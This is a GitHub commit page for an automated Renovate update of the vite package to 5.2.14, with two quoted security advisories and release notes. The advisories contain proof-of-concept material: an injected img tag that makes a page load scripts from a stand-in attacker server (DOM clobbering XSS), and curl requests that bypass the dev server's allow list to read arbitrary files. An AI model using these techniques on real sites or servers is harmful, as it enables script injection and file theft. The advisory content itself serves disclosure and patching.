Skip to content

Commit

Permalink
chore(deps): update dependency vite to v5.2.14 [security] (#80)
Browse files Browse the repository at this point in the history 
This PR contains the following updates:

| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [vite](https://vitejs.dev)
([source](https://redirect.github.com/vitejs/vite/tree/HEAD/packages/vite))
| [`5.2.7` ->
`5.2.14`](https://renovatebot.com/diffs/npm/vite/5.2.7/5.2.14) |
[![age](https://developer.mend.io/api/mc/badges/age/npm/vite/5.2.14?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![adoption](https://developer.mend.io/api/mc/badges/adoption/npm/vite/5.2.14?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![passing](https://developer.mend.io/api/mc/badges/compatibility/npm/vite/5.2.7/5.2.14?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/vite/5.2.7/5.2.14?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|

### GitHub Vulnerability Alerts

####
[CVE-2024-45812](https://redirect.github.com/vitejs/vite/security/advisories/GHSA-64vr-g452-qvp3)

### Summary

We discovered a DOM Clobbering vulnerability in Vite when building
scripts to `cjs`/`iife`/`umd` output format. The DOM Clobbering gadget
in the module can lead to cross-site scripting (XSS) in web pages where
scriptless attacker-controlled HTML elements (e.g., an img tag with an
unsanitized name attribute) are present.

Note that, we have identified similar security issues in Webpack:
GHSA-4vvj-4cpr-p986

### Details

**Backgrounds**

DOM Clobbering is a type of code-reuse attack where the attacker first
embeds a piece of non-script, seemingly benign HTML markups in the
webpage (e.g. through a post or comment) and leverages the gadgets
(pieces of js code) living in the existing javascript code to transform
it into executable code. More for information about DOM Clobbering, here
are some references:

[1] https://scnps.co/papers/sp23_domclob.pdf
[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/

**Gadgets found in Vite**

We have identified a DOM Clobbering vulnerability in Vite bundled
scripts, particularly when the scripts dynamically import other scripts
from the assets folder and the developer sets the build output format to
`cjs`, `iife`, or `umd`. In such cases, Vite replaces relative paths
starting with `__VITE_ASSET__` using the URL retrieved from
`document.currentScript`.

However, this implementation is vulnerable to a DOM Clobbering attack.
The `document.currentScript` lookup can be shadowed by an attacker via
the browser's named DOM tree element access mechanism. This manipulation
allows an attacker to replace the intended script element with a
malicious HTML element. When this happens, the src attribute of the
attacker-controlled element is used as the URL for importing scripts,
potentially leading to the dynamic loading of scripts from an
attacker-controlled server.

```
const relativeUrlMechanisms = {
  amd: (relativePath) => {
    if (relativePath[0] !== ".") relativePath = "./" + relativePath;
    return getResolveUrl(
      `require.toUrl('${escapeId(relativePath)}'), document.baseURI`
    );
  },
  cjs: (relativePath) => `(typeof document === 'undefined' ? ${getFileUrlFromRelativePath(
    relativePath
  )} : ${getRelativeUrlFromDocument(relativePath)})`,
  es: (relativePath) => getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', import.meta.url`
  ),
  iife: (relativePath) => getRelativeUrlFromDocument(relativePath),
  // NOTE: make sure rollup generate `module` params
  system: (relativePath) => getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', module.meta.url`
  ),
  umd: (relativePath) => `(typeof document === 'undefined' && typeof location === 'undefined' ? ${getFileUrlFromRelativePath(
    relativePath
  )} : ${getRelativeUrlFromDocument(relativePath, true)})`
};
```

### PoC

Considering a website that contains the following `main.js` script, the
devloper decides to use the Vite to bundle up the program with the
following configuration.

```
// main.js
import extraURL from './extra.js?url'
var s = document.createElement('script')
s.src = extraURL
document.head.append(s)
```

```
// extra.js
export default "https://myserver/justAnOther.js"
```

```
// vite.config.js
import { defineConfig } from 'vite'

export default defineConfig({
  build: {
    assetsInlineLimit: 0, // To avoid inline assets for PoC
    rollupOptions: {
      output: {
        format: "cjs"
      },
    },
  },
  base: "./",
});
```

After running the build command, the developer will get following bundle
as the output.

```
// dist/index-DDmIg9VD.js
"use strict";const t=""+(typeof document>"u"?require("url").pathToFileURL(__dirname+"/extra-BLVEx9Lb.js").href:new URL("extra-BLVEx9Lb.js",document.currentScript&&document.currentScript.src||document.baseURI).href);var e=document.createElement("script");e.src=t;document.head.append(e);
```

Adding the Vite bundled script, `dist/index-DDmIg9VD.js`, as part of the
web page source code, the page could load the `extra.js` file from the
attacker's domain, `attacker.controlled.server`. The attacker only needs
to insert an `img` tag with the `name` attribute set to `currentScript`.
This can be done through a website's feature that allows users to embed
certain script-less HTML (e.g., markdown renderers, web email clients,
forums) or via an HTML injection vulnerability in third-party JavaScript
loaded on the page.

```
<!DOCTYPE html>
<html>
<head>
  <title>Vite Example</title>
  <!-- Attacker-controlled Script-less HTML Element starts--!>
  <img name="currentScript" src="https://attacker.controlled.server/"></img>
  <!-- Attacker-controlled Script-less HTML Element ends--!>
</head>
<script type="module" crossorigin src="/assets/index-DDmIg9VD.js"></script>
<body>
</body>
</html>
```

### Impact

This vulnerability can result in cross-site scripting (XSS) attacks on
websites that include Vite-bundled files (configured with an output
format of `cjs`, `iife`, or `umd`) and allow users to inject certain
scriptless HTML tags without properly sanitizing the name or id
attributes.

### Patch

```
// https://github.com/vitejs/vite/blob/main/packages/vite/src/node/build.ts#L1296
const getRelativeUrlFromDocument = (relativePath: string, umd = false) =>
  getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', ${
      umd ? `typeof document === 'undefined' ? location.href : ` : ''
    }document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src || document.baseURI`,
  )
```

####
[CVE-2024-45811](https://redirect.github.com/vitejs/vite/security/advisories/GHSA-9cwx-2883-4wfx)

### Summary
The contents of arbitrary files can be returned to the browser.

### Details
`@fs` denies access to files outside of Vite serving allow list. Adding
`?import&raw` to the URL bypasses this limitation and returns the file
content if it exists.

### PoC
```sh
$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@&#8203;fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@&#8203;fs/tmp/secret.txt?import&raw"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...
```

---

### Release Notes

<details>
<summary>vitejs/vite (vite)</summary>

###
[`v5.2.14`](https://redirect.github.com/vitejs/vite/releases/tag/v5.2.14)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v5.2.13...v5.2.14)

Please refer to
[CHANGELOG.md](https://redirect.github.com/vitejs/vite/blob/v5.2.14/packages/vite/CHANGELOG.md)
for details.

###
[`v5.2.13`](https://redirect.github.com/vitejs/vite/releases/tag/v5.2.13)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v5.2.12...v5.2.13)

Please refer to
[CHANGELOG.md](https://redirect.github.com/vitejs/vite/blob/v5.2.13/packages/vite/CHANGELOG.md)
for details.

###
[`v5.2.12`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small5212-2024-05-28-small)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v5.2.11...v5.2.12)

- chore: move to eslint flat config
([#&#8203;16743](https://redirect.github.com/vitejs/vite/issues/16743))
([8f16765](https://redirect.github.com/vitejs/vite/commit/8f16765)),
closes
[#&#8203;16743](https://redirect.github.com/vitejs/vite/issues/16743)
- chore(deps): remove unused deps
([#&#8203;17329](https://redirect.github.com/vitejs/vite/issues/17329))
([5a45745](https://redirect.github.com/vitejs/vite/commit/5a45745)),
closes
[#&#8203;17329](https://redirect.github.com/vitejs/vite/issues/17329)
- chore(deps): update all non-major dependencies
([#&#8203;16722](https://redirect.github.com/vitejs/vite/issues/16722))
([b45922a](https://redirect.github.com/vitejs/vite/commit/b45922a)),
closes
[#&#8203;16722](https://redirect.github.com/vitejs/vite/issues/16722)
- fix: mention `build.rollupOptions.output.manualChunks` instead of
`build.rollupOutput.manualChunks`
([89378c0](https://redirect.github.com/vitejs/vite/commit/89378c0)),
closes
[#&#8203;16721](https://redirect.github.com/vitejs/vite/issues/16721)
- fix(build): make SystemJSWrapRE match lazy
([#&#8203;16633](https://redirect.github.com/vitejs/vite/issues/16633))
([6583ad2](https://redirect.github.com/vitejs/vite/commit/6583ad2)),
closes
[#&#8203;16633](https://redirect.github.com/vitejs/vite/issues/16633)
- fix(css): avoid generating empty JS files when JS files becomes empty
but has CSS files imported
([#&#8203;1](https://redirect.github.com/vitejs/vite/issues/1)
([95fe5a7](https://redirect.github.com/vitejs/vite/commit/95fe5a7)),
closes
[#&#8203;16078](https://redirect.github.com/vitejs/vite/issues/16078)
- fix(css): handle lightningcss compiled css in Deno
([#&#8203;17301](https://redirect.github.com/vitejs/vite/issues/17301))
([8e4e932](https://redirect.github.com/vitejs/vite/commit/8e4e932)),
closes
[#&#8203;17301](https://redirect.github.com/vitejs/vite/issues/17301)
- fix(css): only use files the current bundle contains
([#&#8203;16684](https://redirect.github.com/vitejs/vite/issues/16684))
([15a6ebb](https://redirect.github.com/vitejs/vite/commit/15a6ebb)),
closes
[#&#8203;16684](https://redirect.github.com/vitejs/vite/issues/16684)
- fix(css): page reload was not happening with .css?raw
([#&#8203;16455](https://redirect.github.com/vitejs/vite/issues/16455))
([8041846](https://redirect.github.com/vitejs/vite/commit/8041846)),
closes
[#&#8203;16455](https://redirect.github.com/vitejs/vite/issues/16455)
- fix(deps): update all non-major dependencies
([#&#8203;16603](https://redirect.github.com/vitejs/vite/issues/16603))
([6711553](https://redirect.github.com/vitejs/vite/commit/6711553)),
closes
[#&#8203;16603](https://redirect.github.com/vitejs/vite/issues/16603)
- fix(deps): update all non-major dependencies
([#&#8203;16660](https://redirect.github.com/vitejs/vite/issues/16660))
([bf2f014](https://redirect.github.com/vitejs/vite/commit/bf2f014)),
closes
[#&#8203;16660](https://redirect.github.com/vitejs/vite/issues/16660)
- fix(deps): update all non-major dependencies
([#&#8203;17321](https://redirect.github.com/vitejs/vite/issues/17321))
([4a89766](https://redirect.github.com/vitejs/vite/commit/4a89766)),
closes
[#&#8203;17321](https://redirect.github.com/vitejs/vite/issues/17321)
- fix(error-logging): rollup errors weren't displaying id and codeframe
([#&#8203;16540](https://redirect.github.com/vitejs/vite/issues/16540))
([22dc196](https://redirect.github.com/vitejs/vite/commit/22dc196)),
closes
[#&#8203;16540](https://redirect.github.com/vitejs/vite/issues/16540)
- fix(hmr): normalize the path info
([#&#8203;14255](https://redirect.github.com/vitejs/vite/issues/14255))
([6a085d0](https://redirect.github.com/vitejs/vite/commit/6a085d0)),
closes
[#&#8203;14255](https://redirect.github.com/vitejs/vite/issues/14255)
- fix(hmr): trigger page reload when calling invalidate on root module
([#&#8203;16636](https://redirect.github.com/vitejs/vite/issues/16636))
([2b61cc3](https://redirect.github.com/vitejs/vite/commit/2b61cc3)),
closes
[#&#8203;16636](https://redirect.github.com/vitejs/vite/issues/16636)
- fix(logger): truncate log over 5000 characters long
([#&#8203;16581](https://redirect.github.com/vitejs/vite/issues/16581))
([b0b839a](https://redirect.github.com/vitejs/vite/commit/b0b839a)),
closes
[#&#8203;16581](https://redirect.github.com/vitejs/vite/issues/16581)
- fix(optimizer): log dependencies added by plugins
([#&#8203;16729](https://redirect.github.com/vitejs/vite/issues/16729))
([f0fb987](https://redirect.github.com/vitejs/vite/commit/f0fb987)),
closes
[#&#8203;16729](https://redirect.github.com/vitejs/vite/issues/16729)
- fix(sourcemap): improve sourcemap compatibility for vue2
([#&#8203;16594](https://redirect.github.com/vitejs/vite/issues/16594))
([913c040](https://redirect.github.com/vitejs/vite/commit/913c040)),
closes
[#&#8203;16594](https://redirect.github.com/vitejs/vite/issues/16594)
- docs: correct proxy shorthand example
([#&#8203;15938](https://redirect.github.com/vitejs/vite/issues/15938))
([abf766e](https://redirect.github.com/vitejs/vite/commit/abf766e)),
closes
[#&#8203;15938](https://redirect.github.com/vitejs/vite/issues/15938)
- docs: deprecate server.hot
([#&#8203;16741](https://redirect.github.com/vitejs/vite/issues/16741))
([e7d38ab](https://redirect.github.com/vitejs/vite/commit/e7d38ab)),
closes
[#&#8203;16741](https://redirect.github.com/vitejs/vite/issues/16741)

###
[`v5.2.11`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small5211-2024-05-02-small)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v5.2.10...v5.2.11)

- feat: improve dynamic import variable failure error message
([#&#8203;16519](https://redirect.github.com/vitejs/vite/issues/16519))
([f8feeea](https://redirect.github.com/vitejs/vite/commit/f8feeea)),
closes
[#&#8203;16519](https://redirect.github.com/vitejs/vite/issues/16519)
- fix: dynamic-import-vars plugin normalize path issue
([#&#8203;16518](https://redirect.github.com/vitejs/vite/issues/16518))
([f71ba5b](https://redirect.github.com/vitejs/vite/commit/f71ba5b)),
closes
[#&#8203;16518](https://redirect.github.com/vitejs/vite/issues/16518)
- fix: scripts and styles were missing from built HTML on Windows
([#&#8203;16421](https://redirect.github.com/vitejs/vite/issues/16421))
([0e93f58](https://redirect.github.com/vitejs/vite/commit/0e93f58)),
closes
[#&#8203;16421](https://redirect.github.com/vitejs/vite/issues/16421)
- fix(deps): update all non-major dependencies
([#&#8203;16488](https://redirect.github.com/vitejs/vite/issues/16488))
([2d50be2](https://redirect.github.com/vitejs/vite/commit/2d50be2)),
closes
[#&#8203;16488](https://redirect.github.com/vitejs/vite/issues/16488)
- fix(deps): update all non-major dependencies
([#&#8203;16549](https://redirect.github.com/vitejs/vite/issues/16549))
([2d6a13b](https://redirect.github.com/vitejs/vite/commit/2d6a13b)),
closes
[#&#8203;16549](https://redirect.github.com/vitejs/vite/issues/16549)
- fix(dev): watch publicDir explicitly to include it outside the root
([#&#8203;16502](https://redirect.github.com/vitejs/vite/issues/16502))
([4d83eb5](https://redirect.github.com/vitejs/vite/commit/4d83eb5)),
closes
[#&#8203;16502](https://redirect.github.com/vitejs/vite/issues/16502)
- fix(preload): skip preload for non-static urls
([#&#8203;16556](https://redirect.github.com/vitejs/vite/issues/16556))
([bb79c9b](https://redirect.github.com/vitejs/vite/commit/bb79c9b)),
closes
[#&#8203;16556](https://redirect.github.com/vitejs/vite/issues/16556)
- fix(ssr): handle class declaration and expression name scoping
([#&#8203;16569](https://redirect.github.com/vitejs/vite/issues/16569))
([c071eb3](https://redirect.github.com/vitejs/vite/commit/c071eb3)),
closes
[#&#8203;16569](https://redirect.github.com/vitejs/vite/issues/16569)
- fix(ssr): handle function expression name scoping
([#&#8203;16563](https://redirect.github.com/vitejs/vite/issues/16563))
([02db947](https://redirect.github.com/vitejs/vite/commit/02db947)),
closes
[#&#8203;16563](https://redirect.github.com/vitejs/vite/issues/16563)

###
[`v5.2.10`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small5210-2024-04-20-small)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v5.2.9...v5.2.10)

- revert: perf: use workspace root for fs cache
([#&#8203;15712](https://redirect.github.com/vitejs/vite/issues/15712))
([#&#8203;16476](https://redirect.github.com/vitejs/vite/issues/16476))
([77e7359](https://redirect.github.com/vitejs/vite/commit/77e7359)),
closes
[#&#8203;15712](https://redirect.github.com/vitejs/vite/issues/15712)
[#&#8203;16476](https://redirect.github.com/vitejs/vite/issues/16476)
- fix: add base to virtual html
([#&#8203;16442](https://redirect.github.com/vitejs/vite/issues/16442))
([721f94d](https://redirect.github.com/vitejs/vite/commit/721f94d)),
closes
[#&#8203;16442](https://redirect.github.com/vitejs/vite/issues/16442)
- fix: adjust esm syntax judgment logic
([#&#8203;16436](https://redirect.github.com/vitejs/vite/issues/16436))
([af72eab](https://redirect.github.com/vitejs/vite/commit/af72eab)),
closes
[#&#8203;16436](https://redirect.github.com/vitejs/vite/issues/16436)
- fix: don't add outDirs to watch.ignored if emptyOutDir is false
([#&#8203;16453](https://redirect.github.com/vitejs/vite/issues/16453))
([6a127d6](https://redirect.github.com/vitejs/vite/commit/6a127d6)),
closes
[#&#8203;16453](https://redirect.github.com/vitejs/vite/issues/16453)
- fix(cspNonce): don't overwrite existing nonce values
([#&#8203;16415](https://redirect.github.com/vitejs/vite/issues/16415))
([b872635](https://redirect.github.com/vitejs/vite/commit/b872635)),
closes
[#&#8203;16415](https://redirect.github.com/vitejs/vite/issues/16415)
- feat: show warning if root is in build.outDir
([#&#8203;16454](https://redirect.github.com/vitejs/vite/issues/16454))
([11444dc](https://redirect.github.com/vitejs/vite/commit/11444dc)),
closes
[#&#8203;16454](https://redirect.github.com/vitejs/vite/issues/16454)
- feat: write cspNonce to style tags
([#&#8203;16419](https://redirect.github.com/vitejs/vite/issues/16419))
([8e54bbd](https://redirect.github.com/vitejs/vite/commit/8e54bbd)),
closes
[#&#8203;16419](https://redirect.github.com/vitejs/vite/issues/16419)
- chore(deps): update dependency eslint-plugin-n to v17
([#&#8203;16381](https://redirect.github.com/vitejs/vite/issues/16381))
([6cccef7](https://redirect.github.com/vitejs/vite/commit/6cccef7)),
closes
[#&#8203;16381](https://redirect.github.com/vitejs/vite/issues/16381)

###
[`v5.2.9`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small529-2024-04-15-small)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v5.2.8...v5.2.9)

- fix: `fsp.rm` removing files does not take effect
([#&#8203;16032](https://redirect.github.com/vitejs/vite/issues/16032))
([b05c405](https://redirect.github.com/vitejs/vite/commit/b05c405)),
closes
[#&#8203;16032](https://redirect.github.com/vitejs/vite/issues/16032)
- fix: fix accumulated stacks in error overlay
([#&#8203;16393](https://redirect.github.com/vitejs/vite/issues/16393))
([102c2fd](https://redirect.github.com/vitejs/vite/commit/102c2fd)),
closes
[#&#8203;16393](https://redirect.github.com/vitejs/vite/issues/16393)
- fix(deps): update all non-major dependencies
([#&#8203;16376](https://redirect.github.com/vitejs/vite/issues/16376))
([58a2938](https://redirect.github.com/vitejs/vite/commit/58a2938)),
closes
[#&#8203;16376](https://redirect.github.com/vitejs/vite/issues/16376)
- chore: update region comment
([#&#8203;16380](https://redirect.github.com/vitejs/vite/issues/16380))
([77562c3](https://redirect.github.com/vitejs/vite/commit/77562c3)),
closes
[#&#8203;16380](https://redirect.github.com/vitejs/vite/issues/16380)
- perf: reduce size of injected \__vite\_\_mapDeps code
([#&#8203;16184](https://redirect.github.com/vitejs/vite/issues/16184))
([c0ec6be](https://redirect.github.com/vitejs/vite/commit/c0ec6be)),
closes
[#&#8203;16184](https://redirect.github.com/vitejs/vite/issues/16184)
- perf(css): only replace empty chunk if imported
([#&#8203;16349](https://redirect.github.com/vitejs/vite/issues/16349))
([e2658ad](https://redirect.github.com/vitejs/vite/commit/e2658ad)),
closes
[#&#8203;16349](https://redirect.github.com/vitejs/vite/issues/16349)

###
[`v5.2.8`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small528-2024-04-03-small)

[Compare
Source](https://redirect.github.com/vitejs/vite/compare/v5.2.7...v5.2.8)

- fix: csp nonce injection when no closing tag
([#&#8203;16281](https://redirect.github.com/vitejs/vite/issues/16281))
([#&#8203;16282](https://redirect.github.com/vitejs/vite/issues/16282))
([3c85c6b](https://redirect.github.com/vitejs/vite/commit/3c85c6b)),
closes
[#&#8203;16281](https://redirect.github.com/vitejs/vite/issues/16281)
[#&#8203;16282](https://redirect.github.com/vitejs/vite/issues/16282)
- fix: do not access document in `/@&#8203;vite/client` when not defined
([#&#8203;16318](https://redirect.github.com/vitejs/vite/issues/16318))
([646319c](https://redirect.github.com/vitejs/vite/commit/646319c)),
closes
[#&#8203;16318](https://redirect.github.com/vitejs/vite/issues/16318)
- fix: fix sourcemap when using object as `define` value
([#&#8203;15805](https://redirect.github.com/vitejs/vite/issues/15805))
([445c4f2](https://redirect.github.com/vitejs/vite/commit/445c4f2)),
closes
[#&#8203;15805](https://redirect.github.com/vitejs/vite/issues/15805)
- fix(css): unknown file error happened with lightningcss
([#&#8203;16306](https://redirect.github.com/vitejs/vite/issues/16306))
([01af308](https://redirect.github.com/vitejs/vite/commit/01af308)),
closes
[#&#8203;16306](https://redirect.github.com/vitejs/vite/issues/16306)
- fix(hmr): multiple updates happened when invalidate is called while
multiple tabs open
([#&#8203;16307](https://redirect.github.com/vitejs/vite/issues/16307))
([21cc10b](https://redirect.github.com/vitejs/vite/commit/21cc10b)),
closes
[#&#8203;16307](https://redirect.github.com/vitejs/vite/issues/16307)
- fix(scanner): duplicate modules for same id if glob is used in
html-like types
([#&#8203;16305](https://redirect.github.com/vitejs/vite/issues/16305))
([eca68fa](https://redirect.github.com/vitejs/vite/commit/eca68fa)),
closes
[#&#8203;16305](https://redirect.github.com/vitejs/vite/issues/16305)
- chore(deps): update all non-major dependencies
([#&#8203;16325](https://redirect.github.com/vitejs/vite/issues/16325))
([a78e265](https://redirect.github.com/vitejs/vite/commit/a78e265)),
closes
[#&#8203;16325](https://redirect.github.com/vitejs/vite/issues/16325)
- refactor: use types from sass instead of
[@&#8203;types/sass](https://redirect.github.com/types/sass)
([#&#8203;16340](https://redirect.github.com/vitejs/vite/issues/16340))
([4581e83](https://redirect.github.com/vitejs/vite/commit/4581e83)),
closes
[#&#8203;16340](https://redirect.github.com/vitejs/vite/issues/16340)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" in timezone Europe/Berlin,
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/mheob/changeset-changelog).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC44MC4wIiwidXBkYXRlZEluVmVyIjoiMzguODAuMCIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
  • Loading branch information
@renovate
renovate[bot] authored Oct 17, 2024
1 parent 22137c8 commit 8bdaf43
Showing 1 changed file with 179 additions and 72 deletions.
Loading

0 comments on commit 8bdaf43

Please sign in to comment.